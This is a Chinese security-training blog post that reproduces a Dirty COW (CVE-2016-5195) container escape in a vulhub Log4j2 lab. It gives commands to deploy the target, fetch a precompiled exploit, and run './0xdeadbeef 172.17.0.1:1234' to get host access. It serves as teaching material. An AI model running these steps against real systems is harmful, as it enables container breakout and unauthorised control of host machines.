【学习园地】脏牛容器逃逸复现

admin 2022年8月24日22:45:03评论184 views字数 1131阅读3分46秒阅读模式

【学习园地】脏牛容器逃逸复现
【学习园地】脏牛容器逃逸复现

【学习园地】脏牛容器逃逸复现

1

Linux内核



计算机的硬件,含有外围设备处理器内存硬盘和其他的电子设备组成计算机的发动机。但是没有软件来操作和控制它,自身是不能工作的。完成这个控制工作的软件就称为操作系统,在Linux的术语中被称为“内核”,也可以称为“核心”。Linux内核的主要模块(或组件)分以下几个部分:存储管理CPU和进程管理文件系统设备管理和驱动网络通信以及系统的初始化(引导)系统调用等。


2

测试环境



本次测试系统环境:Ubuntu14.04.3


本次测试内核环境:Linux 4.4.0


本次测试入口:Log4j2漏洞(vulhub靶场)


3
脏牛漏洞


    CVE-2016-5195 即 dirtyCOW ,俗称「脏牛」漏洞,是 Linux Kernel 中的条件竞争漏洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的越权读写

    Copy-on-Write机制:「父进程与子进程共享所有的页框」当任意一方尝试修改某个页框时,COW会启动复制需要修改的页框。


【学习园地】脏牛容器逃逸复现


漏洞范围:Linux内核 >= 2.6.22(到2016年10月18日才修复)


5
漏洞复现


1.下载docker镜像

docker pull vulfocus/log4j2-rce-2021-12-09:latest


2.部署log4j2靶场

docker run -d -p 80:8080 vulfocus/log4j2-rce-2021-12-09:latest


3.利用log4j2的exp打进去

【学习园地】脏牛容器逃逸复现

如何利用log4j2漏洞可以看训练营的前几期

Log4j2复现


4.判断下bash是否为docker

【学习园地】脏牛容器逃逸复现


5.下载编译好的脏牛exp,和一些必须的组件wget、zip、net-tools

【学习园地】脏牛容器逃逸复现


6.给脏牛添加权限chmod 777

【学习园地】脏牛容器逃逸复现


7.查询目前IP,根据目前IP启动脏牛
./0xdeadbeef 172.17.0.1:1234

【学习园地】脏牛容器逃逸复现


容器逃逸已经完成,宿主机权限已经获取这是宿主机的内容

【学习园地】脏牛容器逃逸复现

此时我们尝试写入一个文件给宿主机

【学习园地】脏牛容器逃逸复现

正常使用ssh连接宿主机进行查看

【学习园地】脏牛容器逃逸复现


6
参考文章


【“脏牛”漏洞CVE-2016-5195复现及简要分析】https://blog.csdn.net/arttnba3/article/details/115773316


【脏牛漏洞影响的linux内核,DirtyCow】https://blog.csdn.net/weixin_30276247/article/details/116640236




大学生网络安全尖锋训练营

邮箱|[email protected] 
地址|北京市海淀区奥北科技园20号楼5层

【学习园地】脏牛容器逃逸复现



原文始发于微信公众号(大学生网络安全尖锋训练营):【学习园地】脏牛容器逃逸复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月24日22:45:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【学习园地】脏牛容器逃逸复现http://cn-sec.com/archives/1251620.html

发表评论

匿名网友 填写信息